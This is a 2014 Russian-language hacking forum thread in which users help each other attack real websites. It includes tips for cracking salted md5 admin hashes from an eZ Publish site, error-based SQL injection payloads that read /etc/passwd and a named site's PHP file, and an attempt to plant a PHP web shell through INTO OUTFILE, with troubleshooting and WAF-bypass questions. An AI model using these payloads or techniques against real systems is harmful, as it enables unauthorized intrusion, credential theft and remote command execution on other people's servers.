Старый 02.06.2014, 11:13   #3231
Hodor
 
Регистрация: 16.04.2014
Сообщений: 5
Репутация: 0
По умолчанию

спасибо за ответы и извиняюсь за дезинформацию
цмс eZ Publish 4.6.0
админку нашел на admin.domain.com
столкнулся с проблемой брута хешей, так как формат хеша md5("$salt\n$pass"). известные мне extreme gpu bruteforcer и passwordpro такое брутить не могут(
есть ли другие варианты взлома этой цмс?
Hodor вне форума   Ответить с цитированием
Старый 02.06.2014, 11:25   #3232
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Так ты выбери salt.pass алгоритм, а к своей соли просто добавь перенос строки, только запуск брут наверное нужн будет производить не через файл с хешами, а через командную строку и опции.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 02.06.2014, 11:52   #3233
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Цитата:
Сообщение от Hodor Посмотреть сообщение
спасибо за ответы и извиняюсь за дезинформацию
цмс eZ Publish 4.6.0
админку нашел на admin.domain.com
столкнулся с проблемой брута хешей, так как формат хеша md5("$salt\n$pass"). известные мне extreme gpu bruteforcer и passwordpro такое брутить не могут(
есть ли другие варианты взлома этой цмс?
Как уже сказали, можно просто дописать в соль экранированные переносы строк, в зависимости от брута. Если токены на передергивание пароля не в виде хешей, то всегда есть вариант скинуть админский пароль, а после поставить хеш на место.
madhatter вне форума   Ответить с цитированием
Старый 02.06.2014, 15:54   #3234
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Вопрос. Система md5 (salt + secret) небезопасна. В каких случаях эта система безопасна и небезопасна?

Если соль больше 31 символа, можно ли ускорить процесс брута, или вовсе вывести чистый хэш (без соли)?
NameSpace вне форума   Ответить с цитированием
Старый 02.06.2014, 17:43   #3235
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Если Вы разработчик, то используйте лучше bcrypt или Pbkdf2.
Алгоритмы были спроектированы так, что их трудно вычислить с помощью GPU.
}{оттабыч вне форума   Ответить с цитированием
Старый 03.06.2014, 03:51   #3236
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Подскажите по поводу чтения. File_Priv = Y
Читаю файл /etc/passwd через пост
Код:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),concat(mid(load_file(0x2f6574632f706173737764),1,64),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A) --
успешно

При чтение файла /home/site/siteik.com/authorization.php
Код:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),concat(mid(load_file(0x2f686f6d652f736974652f73697465696b2e636f6d2f617574686f72697a6174696f6e2e706870),1,64),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A) --
Получаю ошибку:
Unknown column 'number' in 'field list'
z0mbie вне форума   Ответить с цитированием
Старый 03.06.2014, 06:05   #3237
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

z0mbie, Надо избежать поступления NULL в mid() (и далее в concat()) или заранее проверить возможность чтения. Пример:
Код:
concat(load_file('/etc/passwd.bak') IS NULL, floor(rand(0) * 2))
Выдаст 1?, если файл нельзя прочитать, и 0?, если можно. Скорее всего для чтения файла нехватает прав или mysql работает на другом сервере. Для проверки существования файла (директории) можно использовать INTO OUTFILE.

}{оттабыч, интересуюсь не для разработки. Хотелось бы почитать больше материала про саму суть (Структуру Меркла — Дамгарда) с примерами конкретных реализаций. Всё что нашел было в очень сжатом виде.

Последний раз редактировалось NameSpace; 03.06.2014 в 06:14..
NameSpace вне форума   Ответить с цитированием
Старый 03.06.2014, 12:30   #3238
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
z0mbie, Надо избежать поступления NULL в mid() (и далее в concat()) или заранее проверить возможность чтения. Пример:
Код:
concat(load_file('/etc/passwd.bak') IS NULL, floor(rand(0) * 2))
Выдаст 1?, если файл нельзя прочитать, и 0?, если можно. Скорее всего для чтения файла нехватает прав или mysql работает на другом сервере. Для проверки существования файла (директории) можно использовать INTO OUTFILE.

}{оттабыч, интересуюсь не для разработки. Хотелось бы почитать больше материала про саму суть (Структуру Меркла — Дамгарда) с примерами конкретных реализаций. Всё что нашел было в очень сжатом виде.
Выдало 1, прочитать нельзя, база подключена к localhost, возможно ли залить шелл если найти папку с правами на запись? И если да, как будет выглядеть запрос при фильтрации кавычек? бэкдор и путь делал в hex, он ругается на хексованый полный путь будущего шелла.
Отправлял так:
Код:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),concat((select/**/0x3C3F4073797374656D28245F4745545B636D645D293F3E/**/INTO/**/OUTFILE/**/0x2f686f6d652f736974652f73697465696b2e636f6d2f696e646578322e706870),0x00,FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A) --
Результат:
Код:
syntax to use near '0x2f686f6d652f736974652f73697465696b2e636f6d2f696e646578322e706870' at line 1
И хотел бы узнать, на некоторых сайтах есть скули, но при любом запросе sql выходит Forbidden . Можно ли как то обойти?

Последний раз редактировалось z0mbie; 03.06.2014 в 13:09..
z0mbie вне форума   Ответить с цитированием
Старый 03.06.2014, 14:10   #3239
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

В докладе http://live.digitaloctober.ru/embed/2993#time1400655892
в примерах "гибкого синтаксиса" показано, что base64_decode() можно использовать без скобок.
Верно ли это?
Мне повторить не удалось.

Всегда думал, что скобки опустить можно только у языковых конструкций (include, echo и т.д.), у функций такой фокус не прокатывал.
Было бы интересно увидеть опровержение.
nikp вне форума   Ответить с цитированием
Старый 03.06.2014, 16:17   #3240
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

z0mbie,

1. С фильтрацией кавчек, в отличие от фильтрации имени файла, ничего не поделать. Остается довольствоваться load_file.
2. Это называется WAF.

nikp, Вроде нет. У конструкций include, echo, print скобки можно добавить, но не опустить. У управляющих конструкций if/for фигурные скобки можно заменить аналогами или просто не использовать.

Как вариант, можно создать алиас функции:
PHP код:
namespace {
    use function 
base64_decode as foo;
    
var_dump(foo("..."));

NameSpace вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot